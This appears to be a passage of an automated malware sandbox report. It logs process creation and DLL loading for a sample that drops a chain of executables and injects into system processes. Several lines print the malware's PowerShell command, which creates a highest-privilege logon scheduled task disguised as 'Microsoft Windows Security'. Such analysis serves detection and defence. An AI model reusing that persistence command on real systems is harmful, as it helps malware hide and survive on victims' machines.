                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeProcess created: C:\Users\user\AppData\Local\Temp\34D7.exe "C:\Users\user\AppData\Local\Temp\34D7.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeProcess created: C:\Users\user\AppData\Local\Temp\896429707.exe C:\Users\user\AppData\Local\Temp\896429707.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeProcess created: C:\Windows\sysnldcvmr.exe C:\Windows\sysnldcvmr.exeJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\1171111125.exe C:\Users\user\AppData\Local\Temp\1171111125.exeJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\78476062.exe C:\Users\user\AppData\Local\Temp\78476062.exeJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\640832494.exe C:\Users\user\AppData\Local\Temp\640832494.exeJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\1657630034.exe C:\Users\user\AppData\Local\Temp\1657630034.exeJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\2910625892.exe C:\Users\user\AppData\Local\Temp\2910625892.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeProcess created: C:\Users\user\AppData\Local\Temp\2779421088.exe C:\Users\user\AppData\Local\Temp\2779421088.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeProcess created: C:\Users\user\AppData\Local\Temp\2688734187.exe C:\Users\user\AppData\Local\Temp\2688734187.exeJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5444 -s 136
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332
                          Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\2688734187.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\AppData\Local\Temp\2688734187.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: firewallapi.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: fwbase.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
